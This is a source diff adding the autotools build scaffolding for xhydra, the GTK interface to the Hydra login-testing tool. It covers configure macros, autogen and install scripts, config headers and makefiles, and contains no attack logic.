dnl maintainer-mode is disabled by default
AC_ARG_ENABLE(maintainer-mode,
[ --enable-maintainer-mode enable make rules and dependencies not useful
(and sometimes confusing) to the casual installer],
USE_MAINTAINER_MODE=$enableval,
USE_MAINTAINER_MODE=no)
AC_MSG_RESULT($USE_MAINTAINER_MODE)
AM_CONDITIONAL(MAINTAINER_MODE, test $USE_MAINTAINER_MODE = yes)
MAINT=$MAINTAINER_MODE_TRUE
AC_SUBST(MAINT)dnl
]
)
# Define a conditional.
AC_DEFUN([AM_CONDITIONAL],
[AC_SUBST($1_TRUE)
AC_SUBST($1_FALSE)
if $2; then
$1_TRUE=
$1_FALSE='#'
else
$1_TRUE='#'
$1_FALSE=
fi])
# isc-posix.m4 serial 2 (gettext-0.11.2)
dnl Copyright (C) 1995-2002 Free Software Foundation, Inc.
dnl This file is free software, distributed under the terms of the GNU
dnl General Public License. As a special exception to the GNU General
dnl Public License, this file may be distributed as part of a program
dnl that contains a configuration script generated by Autoconf, under
dnl the same distribution terms as the rest of that program.
# This file is not needed with autoconf-2.53 and newer. Remove it in 2005.
# This test replaces the one in autoconf.
# Currently this macro should have the same name as the autoconf macro
# because gettext's gettext.m4 (distributed in the automake package)
# still uses it. Otherwise, the use in gettext.m4 makes autoheader
# give these diagnostics:
# configure.in:556: AC_TRY_COMPILE was called before AC_ISC_POSIX
# configure.in:556: AC_TRY_RUN was called before AC_ISC_POSIX
undefine([AC_ISC_POSIX])
AC_DEFUN([AC_ISC_POSIX],
[
dnl This test replaces the obsolescent AC_ISC_POSIX kludge.
AC_CHECK_LIB(cposix, strerror, [LIBS="$LIBS -lcposix"])
]
)
# serial 1
# @defmac AC_PROG_CC_STDC
# @maindex PROG_CC_STDC
# @ovindex CC
# If the C compiler in not in ANSI C mode by default, try to add an option
# to output variable @code{CC} to make it so. This macro tries various
# options that select ANSI C on some system or another. It considers the
# compiler to be in ANSI C mode if it handles function prototypes correctly.
#
# If you use this macro, you should check after calling it whether the C
# compiler has been set to accept ANSI C; if not, the shell variable
# @code{am_cv_prog_cc_stdc} is set to @samp{no}. If you wrote your source
# code in ANSI C, you can make an un-ANSIfied copy of it by using the
# program @code{ansi2knr}, which comes with Ghostscript.
# @end defmac
AC_DEFUN([AM_PROG_CC_STDC],
[AC_REQUIRE([AC_PROG_CC])
AC_BEFORE([$0], [AC_C_INLINE])
AC_BEFORE([$0], [AC_C_CONST])
dnl Force this before AC_PROG_CPP. Some cpp's, eg on HPUX, require
dnl a magic option to avoid problems with ANSI preprocessor commands
dnl like #elif.
dnl FIXME: can't do this because then AC_AIX won't work due to a
dnl circular dependency.
dnl AC_BEFORE([$0], [AC_PROG_CPP])
AC_MSG_CHECKING(for ${CC-cc} option to accept ANSI C)
AC_CACHE_VAL(am_cv_prog_cc_stdc,
[am_cv_prog_cc_stdc=no
ac_save_CC="$CC"
# Don't try gcc -ansi; that turns off useful extensions and
# breaks some systems' header files.
# AIX -qlanglvl=ansi
# Ultrix and OSF/1 -std1
# HP-UX -Aa -D_HPUX_SOURCE
# SVR4 -Xc -D__EXTENSIONS__
for ac_arg in "" -qlanglvl=ansi -std1 "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__"
do
CC="$ac_save_CC $ac_arg"
AC_TRY_COMPILE(
[#include <stdarg.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
/* Most of the following tests are stolen from RCS 5.7's src/conf.sh. */
struct buf { int x; };
FILE * (*rcsopen) (struct buf *, struct stat *, int);
static char *e (p, i)
char **p;
int i;
{
return p[i];
}
static char *f (char * (*g) (char **, int), char **p, ...)
{
char *s;
va_list v;
va_start (v,p);
s = g (p, va_arg (v,int));
va_end (v);
return s;
}
int test (int i, double x);
struct s1 {int (*f) (int a);};
struct s2 {int (*f) (double a);};
int pairnames (int, char **, FILE *(*)(struct buf *, struct stat *, int), int, int);
int argc;
char **argv;
], [
return f (e, argv, 0) != argv[0] || f (e, argv, 1) != argv[1];
],
[am_cv_prog_cc_stdc="$ac_arg"; break])
done
CC="$ac_save_CC"
])
if test -z "$am_cv_prog_cc_stdc"; then
AC_MSG_RESULT([none needed])
else
AC_MSG_RESULT($am_cv_prog_cc_stdc)
fi
case "x$am_cv_prog_cc_stdc" in
x|xno) ;;
*) CC="$CC $am_cv_prog_cc_stdc" ;;
esac
])
dnl PKG_CHECK_MODULES(GSTUFF, gtk+-2.0 >= 1.3 glib = 1.3.4, action-if, action-not)
dnl defines GSTUFF_LIBS, GSTUFF_CFLAGS, see pkg-config man page
dnl also defines GSTUFF_PKG_ERRORS on error
AC_DEFUN(PKG_CHECK_MODULES, [
succeeded=no
if test -z "$PKG_CONFIG"; then
AC_PATH_PROG(PKG_CONFIG, pkg-config, no)
fi
if test "$PKG_CONFIG" = "no" ; then
echo "*** The pkg-config script could not be found. Make sure it is"
echo "*** in your path, or set the PKG_CONFIG environment variable"
echo "*** to the full path to pkg-config."
echo "*** Or see http://www.freedesktop.org/software/pkgconfig to get pkg-config."
else
PKG_CONFIG_MIN_VERSION=0.9.0
if $PKG_CONFIG --atleast-pkgconfig-version $PKG_CONFIG_MIN_VERSION; then
AC_MSG_CHECKING(for $2)
if $PKG_CONFIG --exists "$2" ; then
AC_MSG_RESULT(yes)
succeeded=yes
AC_MSG_CHECKING($1_CFLAGS)
$1_CFLAGS=`$PKG_CONFIG --cflags "$2"`
AC_MSG_RESULT($$1_CFLAGS)
AC_MSG_CHECKING($1_LIBS)
$1_LIBS=`$PKG_CONFIG --libs "$2"`
AC_MSG_RESULT($$1_LIBS)
else
$1_CFLAGS=""
$1_LIBS=""
## If we have a custom action on failure, don't print errors, but
## do set a variable so people can do so.
$1_PKG_ERRORS=`$PKG_CONFIG --errors-to-stdout --print-errors "$2"`
ifelse([$4], ,echo $$1_PKG_ERRORS,)
fi
AC_SUBST($1_CFLAGS)
AC_SUBST($1_LIBS)
else
echo "*** Your version of pkg-config is too old. You need version $PKG_CONFIG_MIN_VERSION or newer."
echo "*** See http://www.freedesktop.org/software/pkgconfig"
fi
fi
if test $succeeded = yes; then
ifelse([$3], , :, [$3])
else
ifelse([$4], , AC_MSG_ERROR([Library requirements ($2) not met; consider adjusting the PKG_CONFIG_PATH environment variable if your libraries are in a nonstandard prefix so pkg-config can find them.]), [$4])
fi
])

159
hydra-gtk/autogen.sh Executable file
View file

@ -0,0 +1,159 @@
#!/bin/sh
# Run this to generate all the initial makefiles, etc.
srcdir=`dirname $0`
test -z "$srcdir" && srcdir=.
DIE=0
if [ -n "$GNOME2_DIR" ]; then
ACLOCAL_FLAGS="-I $GNOME2_DIR/share/aclocal $ACLOCAL_FLAGS"
LD_LIBRARY_PATH="$GNOME2_DIR/lib:$LD_LIBRARY_PATH"
PATH="$GNOME2_DIR/bin:$PATH"
export PATH
export LD_LIBRARY_PATH
fi
(test -f $srcdir/configure.in) || {
echo -n "**Error**: Directory "\`$srcdir\'" does not look like the"
echo " top-level package directory"
exit 1
}
(autoconf --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`autoconf' installed."
echo "Download the appropriate package for your distribution,"
echo "or get the source tarball at ftp://ftp.gnu.org/pub/gnu/"
DIE=1
}
(grep "^AC_PROG_INTLTOOL" $srcdir/configure.in >/dev/null) && {
(intltoolize --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`intltool' installed."
echo "You can get it from:"
echo " ftp://ftp.gnome.org/pub/GNOME/"
DIE=1
}
}
(grep "^AM_PROG_XML_I18N_TOOLS" $srcdir/configure.in >/dev/null) && {
(xml-i18n-toolize --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`xml-i18n-toolize' installed."
echo "You can get it from:"
echo " ftp://ftp.gnome.org/pub/GNOME/"
DIE=1
}
}
(grep "^AM_PROG_LIBTOOL" $srcdir/configure.in >/dev/null) && {
(libtool --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`libtool' installed."
echo "You can get it from: ftp://ftp.gnu.org/pub/gnu/"
DIE=1
}
}
(grep "^AM_GLIB_GNU_GETTEXT" $srcdir/configure.in >/dev/null) && {
(grep "sed.*POTFILES" $srcdir/configure.in) > /dev/null || \
(glib-gettextize --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`glib' installed."
echo "You can get it from: ftp://ftp.gtk.org/pub/gtk"
DIE=1
}
}
(automake --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`automake' installed."
echo "You can get it from: ftp://ftp.gnu.org/pub/gnu/"
DIE=1
NO_AUTOMAKE=yes
}
# if no automake, don't bother testing for aclocal
test -n "$NO_AUTOMAKE" || (aclocal --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: Missing \`aclocal'. The version of \`automake'"
echo "installed doesn't appear recent enough."
echo "You can get automake from ftp://ftp.gnu.org/pub/gnu/"
DIE=1
}
if test "$DIE" -eq 1; then
exit 1
fi
if test -z "$*"; then
echo "**Warning**: I am going to run \`configure' with no arguments."
echo "If you wish to pass any to it, please specify them on the"
echo \`$0\'" command line."
echo
fi
case $CC in
xlc )
am_opt=--include-deps;;
esac
for coin in `find $srcdir -path $srcdir/CVS -prune -o -name configure.in -print`
do
dr=`dirname $coin`
if test -f $dr/NO-AUTO-GEN; then
echo skipping $dr -- flagged as no auto-gen
else
echo processing $dr
( cd $dr
aclocalinclude="$ACLOCAL_FLAGS"
if grep "^AM_GLIB_GNU_GETTEXT" configure.in >/dev/null; then
echo "Creating $dr/aclocal.m4 ..."
test -r $dr/aclocal.m4 || touch $dr/aclocal.m4
echo "Running glib-gettextize... Ignore non-fatal messages."
echo "no" | glib-gettextize --force --copy
echo "Making $dr/aclocal.m4 writable ..."
test -r $dr/aclocal.m4 && chmod u+w $dr/aclocal.m4
fi
if grep "^AC_PROG_INTLTOOL" configure.in >/dev/null; then
echo "Running intltoolize..."
intltoolize --copy --force --automake
fi
if grep "^AM_PROG_XML_I18N_TOOLS" configure.in >/dev/null; then
echo "Running xml-i18n-toolize..."
xml-i18n-toolize --copy --force --automake
fi
if grep "^AM_PROG_LIBTOOL" configure.in >/dev/null; then
if test -z "$NO_LIBTOOLIZE" ; then
echo "Running libtoolize..."
libtoolize --force --copy
fi
fi
echo "Running aclocal $aclocalinclude ..."
aclocal $aclocalinclude
if grep "^AM_CONFIG_HEADER" configure.in >/dev/null; then
echo "Running autoheader..."
autoheader
fi
echo "Running automake --gnu $am_opt ..."
automake --add-missing --gnu $am_opt
echo "Running autoconf ..."
autoconf
)
fi
done
conf_flags="--enable-maintainer-mode"
if test x$NOCONFIGURE = x; then
echo Running $srcdir/configure $conf_flags "$@" ...
$srcdir/configure $conf_flags "$@" \
&& echo Now type \`make\' to compile. || exit 1
else
echo Skipping configure process.
fi

33
hydra-gtk/config.h Executable file
View file

@ -0,0 +1,33 @@
/* config.h. Generated by configure. */
/* config.h.in. Generated from configure.in by autoheader. */
/* #undef ENABLE_NLS */
/* #undef HAVE_CATGETS */
/* #undef HAVE_GETTEXT */
/* #undef GETTEXT_PACKAGE */
/* #undef HAVE_LC_MESSAGES */
/* #undef HAVE_STPCPY */
/* #undef HAVE_LIBSM */
/* Name of package */
#define PACKAGE "xhydra"
/* Define to the address where bug reports for this package should be sent. */
#define PACKAGE_BUGREPORT ""
/* Define to the full name of this package. */
#define PACKAGE_NAME ""
/* Define to the full name and version of this package. */
#define PACKAGE_STRING ""
/* Define to the one symbol short name of this package. */
#define PACKAGE_TARNAME ""
/* Define to the version of this package. */
#define PACKAGE_VERSION ""
/* Define to 1 if you have the ANSI C header files. */
#define STDC_HEADERS 1
/* Version number of package */
#define VERSION "0.1"

32
hydra-gtk/config.h.in Executable file
View file

@ -0,0 +1,32 @@
/* config.h.in. Generated from configure.in by autoheader. */
#undef ENABLE_NLS
#undef HAVE_CATGETS
#undef HAVE_GETTEXT
#undef GETTEXT_PACKAGE
#undef HAVE_LC_MESSAGES
#undef HAVE_STPCPY
#undef HAVE_LIBSM
/* Name of package */
#undef PACKAGE
/* Define to the address where bug reports for this package should be sent. */
#undef PACKAGE_BUGREPORT
/* Define to the full name of this package. */
#undef PACKAGE_NAME
/* Define to the full name and version of this package. */
#undef PACKAGE_STRING
/* Define to the one symbol short name of this package. */
#undef PACKAGE_TARNAME
/* Define to the version of this package. */
#undef PACKAGE_VERSION
/* Define to 1 if you have the ANSI C header files. */
#undef STDC_HEADERS
/* Version number of package */
#undef VERSION

5203
hydra-gtk/configure vendored Executable file
View file

File diff suppressed because it is too large Load diff

22
hydra-gtk/configure.in Executable file
View file

@ -0,0 +1,22 @@
dnl Process this file with autoconf to produce a configure script.
AC_INIT(configure.in)
AM_INIT_AUTOMAKE(xhydra, 0.1)
AM_CONFIG_HEADER(config.h)
AM_MAINTAINER_MODE
AC_ISC_POSIX
AC_PROG_CC
AM_PROG_CC_STDC
AC_HEADER_STDC
pkg_modules="gtk+-2.0 >= 2.0.0"
PKG_CHECK_MODULES(PACKAGE, [$pkg_modules])
AC_SUBST(PACKAGE_CFLAGS)
AC_SUBST(PACKAGE_LIBS)
AC_OUTPUT([
Makefile
src/Makefile
])

251
hydra-gtk/install-sh Executable file
View file

@ -0,0 +1,251 @@
#!/bin/sh
#
# install - install a program, script, or datafile
# This comes from X11R5 (mit/util/scripts/install.sh).
#
# Copyright 1991 by the Massachusetts Institute of Technology
#
# Permission to use, copy, modify, distribute, and sell this software and its
# documentation for any purpose is hereby granted without fee, provided that
# the above copyright notice appear in all copies and that both that
# copyright notice and this permission notice appear in supporting
# documentation, and that the name of M.I.T. not be used in advertising or
# publicity pertaining to distribution of the software without specific,
# written prior permission. M.I.T. makes no representations about the
# suitability of this software for any purpose. It is provided "as is"
# without express or implied warranty.
#
# Calling this script install-sh is preferred over install.sh, to prevent
# `make' implicit rules from creating a file called install from it
# when there is no Makefile.
#
# This script is compatible with the BSD install script, but was written
# from scratch. It can only install one file at a time, a restriction
# shared with many OS's install programs.
# set DOITPROG to echo to test this script
# Don't use :- since 4.3BSD and earlier shells don't like it.
doit="${DOITPROG-}"
# put in absolute paths if you don't have them in your path; or use env. vars.
mvprog="${MVPROG-mv}"
cpprog="${CPPROG-cp}"
chmodprog="${CHMODPROG-chmod}"
chownprog="${CHOWNPROG-chown}"
chgrpprog="${CHGRPPROG-chgrp}"
stripprog="${STRIPPROG-strip}"
rmprog="${RMPROG-rm}"
mkdirprog="${MKDIRPROG-mkdir}"
transformbasename=""
transform_arg=""
instcmd="$mvprog"
chmodcmd="$chmodprog 0755"
chowncmd=""
chgrpcmd=""
stripcmd=""
rmcmd="$rmprog -f"
mvcmd="$mvprog"
src=""
dst=""
dir_arg=""
while [ x"$1" != x ]; do
case $1 in
-c) instcmd="$cpprog"
shift
continue;;
-d) dir_arg=true
shift
continue;;
-m) chmodcmd="$chmodprog $2"
shift
shift
continue;;
-o) chowncmd="$chownprog $2"
shift
shift
continue;;
-g) chgrpcmd="$chgrpprog $2"
shift
shift
continue;;
-s) stripcmd="$stripprog"
shift
continue;;
-t=*) transformarg=`echo $1 | sed 's/-t=//'`
shift
continue;;
-b=*) transformbasename=`echo $1 | sed 's/-b=//'`
shift
continue;;
*) if [ x"$src" = x ]
then
src=$1
else
# this colon is to work around a 386BSD /bin/sh bug
:
dst=$1
fi
shift
continue;;
esac
done
if [ x"$src" = x ]
then
echo "install: no input file specified"
exit 1
else
true
fi
if [ x"$dir_arg" != x ]; then
dst=$src
src=""
if [ -d $dst ]; then
instcmd=:
chmodcmd=""
else
instcmd=mkdir
fi
else
# Waiting for this to be detected by the "$instcmd $src $dsttmp" command
# might cause directories to be created, which would be especially bad
# if $src (and thus $dsttmp) contains '*'.
if [ -f $src -o -d $src ]
then
true
else
echo "install: $src does not exist"
exit 1
fi
if [ x"$dst" = x ]
then
echo "install: no destination specified"
exit 1
else
true
fi
# If destination is a directory, append the input filename; if your system
# does not like double slashes in filenames, you may need to add some logic
if [ -d $dst ]
then
dst="$dst"/`basename $src`
else
true
fi
fi
## this sed command emulates the dirname command
dstdir=`echo $dst | sed -e 's,[^/]*$,,;s,/$,,;s,^$,.,'`
# Make sure that the destination directory exists.
# this part is taken from Noah Friedman's mkinstalldirs script
# Skip lots of stat calls in the usual case.
if [ ! -d "$dstdir" ]; then
defaultIFS='
'
IFS="${IFS-${defaultIFS}}"
oIFS="${IFS}"
# Some sh's can't handle IFS=/ for some reason.
IFS='%'
set - `echo ${dstdir} | sed -e 's@/@%@g' -e 's@^%@/@'`
IFS="${oIFS}"
pathcomp=''
while [ $# -ne 0 ] ; do
pathcomp="${pathcomp}${1}"
shift
if [ ! -d "${pathcomp}" ] ;
then
$mkdirprog "${pathcomp}"
else
true
fi
pathcomp="${pathcomp}/"
done
fi
if [ x"$dir_arg" != x ]
then
$doit $instcmd $dst &&
if [ x"$chowncmd" != x ]; then $doit $chowncmd $dst; else true ; fi &&
if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dst; else true ; fi &&
if [ x"$stripcmd" != x ]; then $doit $stripcmd $dst; else true ; fi &&
if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dst; else true ; fi
else
# If we're going to rename the final executable, determine the name now.
if [ x"$transformarg" = x ]
then
dstfile=`basename $dst`
else
dstfile=`basename $dst $transformbasename |
sed $transformarg`$transformbasename
fi
# don't allow the sed command to completely eliminate the filename
if [ x"$dstfile" = x ]
then
dstfile=`basename $dst`
else
true
fi
# Make a temp file name in the proper directory.
dsttmp=$dstdir/#inst.$$#
# Move or copy the file name to the temp name
$doit $instcmd $src $dsttmp &&
trap "rm -f ${dsttmp}" 0 &&
# and set any options; do chmod last to preserve setuid bits
# If any of these fail, we abort the whole thing. If we want to
# ignore errors from any of these, just make sure not to ignore
# errors from the above "$doit $instcmd $src $dsttmp" command.
if [ x"$chowncmd" != x ]; then $doit $chowncmd $dsttmp; else true;fi &&
if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dsttmp; else true;fi &&
if [ x"$stripcmd" != x ]; then $doit $stripcmd $dsttmp; else true;fi &&
if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dsttmp; else true;fi &&
# Now rename the file to the real destination.
$doit $rmcmd -f $dstdir/$dstfile &&
$doit $mvcmd $dsttmp $dstdir/$dstfile
fi &&
exit 0

20
hydra-gtk/make_xhydra.sh Executable file
View file

@ -0,0 +1,20 @@
#!/bin/bash
PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/opt/gnome/lib/pkgconfig
export PKG_CONFIG_PATH
echo "Trying to compile xhydra now (hydra gtk gui) - dont worry if this fails, this is really optional ..."
./configure > /dev/null 2> errors
test -e Makefile || {
echo "Error: configure wasnt happy. Analyse this:"
cat errors
exit 1
}
make > /dev/null 2> errors
test -e src/xhydra || {
echo "Error: could not compile. Analyse this:"
cat errors
echo
echo 'Do not worry, as I said, xhydra is really optional. ./hydra is ready to go!'
exit 0
}
cp -v src/xhydra ..
echo "The GTK GUI is ready, type \"./xhydra\" to start"

198
hydra-gtk/missing Executable file
View file

@ -0,0 +1,198 @@
#! /bin/sh
# Common stub for a few missing GNU programs while installing.
# Copyright (C) 1996, 1997, 2001, 2002 Free Software Foundation, Inc.
# Franc,ois Pinard <pinard@iro.umontreal.ca>, 1996.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# 02111-1307, USA.
if test $# -eq 0; then
echo 1>&2 "Try \`$0 --help' for more information"
exit 1
fi
# In the cases where this matters, `missing' is being run in the
# srcdir already.
if test -f configure.in; then
configure_ac=configure.ac
else
configure_ac=configure.in
fi
case "$1" in
-h|--h|--he|--hel|--help)
echo "\
$0 [OPTION]... PROGRAM [ARGUMENT]...
Handle \`PROGRAM [ARGUMENT]...' for when PROGRAM is missing, or return an
error status if there is no known handling for PROGRAM.
Options:
-h, --help display this help and exit
-v, --version output version information and exit
Supported PROGRAM values:
aclocal touch file \`aclocal.m4'
autoconf touch file \`configure'
autoheader touch file \`config.h.in'
automake touch all \`Makefile.in' files
bison create \`y.tab.[ch]', if possible, from existing .[ch]
flex create \`lex.yy.c', if possible, from existing .c
lex create \`lex.yy.c', if possible, from existing .c
makeinfo touch the output file
yacc create \`y.tab.[ch]', if possible, from existing .[ch]"
;;
-v|--v|--ve|--ver|--vers|--versi|--versio|--version)
echo "missing - GNU libit 0.0"
;;
-*)
echo 1>&2 "$0: Unknown \`$1' option"
echo 1>&2 "Try \`$0 --help' for more information"
exit 1
;;
aclocal*)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified \`acinclude.m4' or \`$configure_ac'. You might want
to install the \`Automake' and \`Perl' packages. Grab them from
any GNU archive site."
touch aclocal.m4
;;
autoconf)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified \`$configure_ac'. You might want to install the
\`Autoconf' and \`GNU m4' packages. Grab them from any GNU
archive site."
touch configure
;;
autoheader)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified \`acconfig.h' or \`$configure_ac'. You might want
to install the \`Autoconf' and \`GNU m4' packages. Grab them
from any GNU archive site."
files=`sed -n 's/^[ ]*A[CM]_CONFIG_HEADER(\([^)]*\)).*/\1/p' $configure_ac`
test -z "$files" && files="config.h"
touch_files=
for f in $files; do
case "$f" in
*:*) touch_files="$touch_files "`echo "$f" |
sed -e 's/^[^:]*://' -e 's/:.*//'`;;
*) touch_files="$touch_files $f.in";;
esac
done
touch $touch_files
;;
automake*)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified \`Makefile.am', \`acinclude.m4' or \`$configure_ac'.
You might want to install the \`Automake' and \`Perl' packages.
Grab them from any GNU archive site."
find . -type f -name Makefile.am -print |
sed 's/\.am$/.in/' |
while read f; do touch "$f"; done
;;
bison|yacc)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified a \`.y' file. You may need the \`Bison' package
in order for those modifications to take effect. You can get
\`Bison' from any GNU archive site."
rm -f y.tab.c y.tab.h
if [ $# -ne 1 ]; then
eval LASTARG="\${$#}"
case "$LASTARG" in
*.y)
SRCFILE=`echo "$LASTARG" | sed 's/y$/c/'`
if [ -f "$SRCFILE" ]; then
cp "$SRCFILE" y.tab.c
fi
SRCFILE=`echo "$LASTARG" | sed 's/y$/h/'`
if [ -f "$SRCFILE" ]; then
cp "$SRCFILE" y.tab.h
fi
;;
esac
fi
if [ ! -f y.tab.h ]; then
echo >y.tab.h
fi
if [ ! -f y.tab.c ]; then
echo 'main() { return 0; }' >y.tab.c
fi
;;
lex|flex)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified a \`.l' file. You may need the \`Flex' package
in order for those modifications to take effect. You can get
\`Flex' from any GNU archive site."
rm -f lex.yy.c
if [ $# -ne 1 ]; then
eval LASTARG="\${$#}"
case "$LASTARG" in
*.l)
SRCFILE=`echo "$LASTARG" | sed 's/l$/c/'`
if [ -f "$SRCFILE" ]; then
cp "$SRCFILE" lex.yy.c
fi
;;
esac
fi
if [ ! -f lex.yy.c ]; then
echo 'main() { return 0; }' >lex.yy.c
fi
;;
makeinfo)
echo 1>&2 "\
WARNING: \`$1' is missing on your system. You should only need it if
you modified a \`.texi' or \`.texinfo' file, or any other file
indirectly affecting the aspect of the manual. The spurious
call might also be the consequence of using a buggy \`make' (AIX,
DU, IRIX). You might want to install the \`Texinfo' package or
the \`GNU make' package. Grab either from any GNU archive site."
file=`echo "$*" | sed -n 's/.*-o \([^ ]*\).*/\1/p'`
if test -z "$file"; then
file=`echo "$*" | sed 's/.* \([^ ]*\) *$/\1/'`
file=`sed -n '/^@setfilename/ { s/.* \([^ ]*\) *$/\1/; p; q; }' $file`
fi
touch $file
;;
*)
echo 1>&2 "\
WARNING: \`$1' is needed, and you do not seem to have it handy on your
system. You might have modified some files without having the
proper tools for further handling them. Check the \`README' file,
it often tells you about the needed prerequirements for installing
this package. You may also peek at any GNU archive site, in case
some other package would contain this missing \`$1' program."
exit 1
;;
esac
exit 0

40
hydra-gtk/mkinstalldirs Executable file
View file

@ -0,0 +1,40 @@
#! /bin/sh
# mkinstalldirs --- make directory hierarchy
# Author: Noah Friedman <friedman@prep.ai.mit.edu>
# Created: 1993-05-16
# Public domain
# $Id: mkinstalldirs,v 1.13 1999/01/05 03:18:55 bje Exp $
errstatus=0
for file
do
set fnord `echo ":$file" | sed -ne 's/^:\//#/;s/^://;s/\// /g;s/^#/\//;p'`
shift
pathcomp=
for d
do
pathcomp="$pathcomp$d"
case "$pathcomp" in
-* ) pathcomp=./$pathcomp ;;
esac
if test ! -d "$pathcomp"; then
echo "mkdir $pathcomp"
mkdir "$pathcomp" || lasterr=$?
if test ! -d "$pathcomp"; then
errstatus=$lasterr
fi
fi
pathcomp="$pathcomp/"
done
done
exit $errstatus
# mkinstalldirs ends here

17
hydra-gtk/src/Makefile.am Executable file
View file

@ -0,0 +1,17 @@
## Process this file with automake to produce Makefile.in
INCLUDES = \
-DPACKAGE_DATA_DIR=\""$(datadir)"\" \
-DPACKAGE_LOCALE_DIR=\""$(prefix)/$(DATADIRNAME)/locale"\" \
@PACKAGE_CFLAGS@
bin_PROGRAMS = xhydra
xhydra_SOURCES = \
main.c \
support.c support.h \
interface.c interface.h \
callbacks.c callbacks.h
xhydra_LDADD = @PACKAGE_LIBS@

319
hydra-gtk/src/Makefile.in Executable file
View file

@ -0,0 +1,319 @@
# Makefile.in generated automatically by automake 1.4-p6 from Makefile.am
# Copyright (C) 1994, 1995-8, 1999, 2001 Free Software Foundation, Inc.
# This Makefile.in is free software; the Free Software Foundation
# gives unlimited permission to copy and/or distribute it,
# with or without modifications, as long as this notice is preserved.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY, to the extent permitted by law; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE.
SHELL = @SHELL@
srcdir = @srcdir@
top_srcdir = @top_srcdir@
VPATH = @srcdir@
prefix = @prefix@
exec_prefix = @exec_prefix@
bindir = @bindir@
sbindir = @sbindir@
libexecdir = @libexecdir@
datadir = @datadir@
sysconfdir = @sysconfdir@
sharedstatedir = @sharedstatedir@
localstatedir = @localstatedir@
libdir = @libdir@
infodir = @infodir@
mandir = @mandir@
includedir = @includedir@
oldincludedir = /usr/include
DESTDIR =
pkgdatadir = $(datadir)/@PACKAGE@
pkglibdir = $(libdir)/@PACKAGE@
pkgincludedir = $(includedir)/@PACKAGE@
top_builddir = ..
ACLOCAL = @ACLOCAL@
AUTOCONF = @AUTOCONF@
AUTOMAKE = @AUTOMAKE@
AUTOHEADER = @AUTOHEADER@
INSTALL = @INSTALL@
INSTALL_PROGRAM = @INSTALL_PROGRAM@ $(AM_INSTALL_PROGRAM_FLAGS)
INSTALL_DATA = @INSTALL_DATA@
INSTALL_SCRIPT = @INSTALL_SCRIPT@
transform = @program_transform_name@
NORMAL_INSTALL = :
PRE_INSTALL = :
POST_INSTALL = :
NORMAL_UNINSTALL = :
PRE_UNINSTALL = :
POST_UNINSTALL = :
CC = @CC@
MAINT = @MAINT@
MAKEINFO = @MAKEINFO@
PACKAGE = @PACKAGE@
PACKAGE_CFLAGS = @PACKAGE_CFLAGS@
PACKAGE_LIBS = @PACKAGE_LIBS@
PKG_CONFIG = @PKG_CONFIG@
VERSION = @VERSION@
INCLUDES = -DPACKAGE_DATA_DIR=\""$(datadir)"\" -DPACKAGE_LOCALE_DIR=\""$(prefix)/$(DATADIRNAME)/locale"\" @PACKAGE_CFLAGS@
bin_PROGRAMS = xhydra
xhydra_SOURCES = main.c support.c support.h interface.c interface.h callbacks.c callbacks.h
xhydra_LDADD = @PACKAGE_LIBS@
mkinstalldirs = $(SHELL) $(top_srcdir)/mkinstalldirs
CONFIG_HEADER = ../config.h
CONFIG_CLEAN_FILES =
PROGRAMS = $(bin_PROGRAMS)
DEFS = @DEFS@ -I. -I$(srcdir) -I..
CPPFLAGS = @CPPFLAGS@
LDFLAGS = @LDFLAGS@
LIBS = @LIBS@
xhydra_OBJECTS = main.o support.o interface.o callbacks.o
xhydra_DEPENDENCIES =
xhydra_LDFLAGS =
CFLAGS = @CFLAGS@
COMPILE = $(CC) $(DEFS) $(INCLUDES) $(AM_CPPFLAGS) $(CPPFLAGS) $(AM_CFLAGS) $(CFLAGS)
CCLD = $(CC)
LINK = $(CCLD) $(AM_CFLAGS) $(CFLAGS) $(LDFLAGS) -o $@
DIST_COMMON = Makefile.am Makefile.in
DISTFILES = $(DIST_COMMON) $(SOURCES) $(HEADERS) $(TEXINFOS) $(EXTRA_DIST)
TAR = tar
GZIP_ENV = --best
DEP_FILES = .deps/callbacks.P .deps/interface.P .deps/main.P \
.deps/support.P
SOURCES = $(xhydra_SOURCES)
OBJECTS = $(xhydra_OBJECTS)
all: all-redirect
.SUFFIXES:
.SUFFIXES: .S .c .o .s
$(srcdir)/Makefile.in: @MAINTAINER_MODE_TRUE@ Makefile.am $(top_srcdir)/configure.in $(ACLOCAL_M4)
cd $(top_srcdir) && $(AUTOMAKE) --gnu src/Makefile
Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status $(BUILT_SOURCES)
cd $(top_builddir) \
&& CONFIG_FILES=$(subdir)/$@ CONFIG_HEADERS= $(SHELL) ./config.status
mostlyclean-binPROGRAMS:
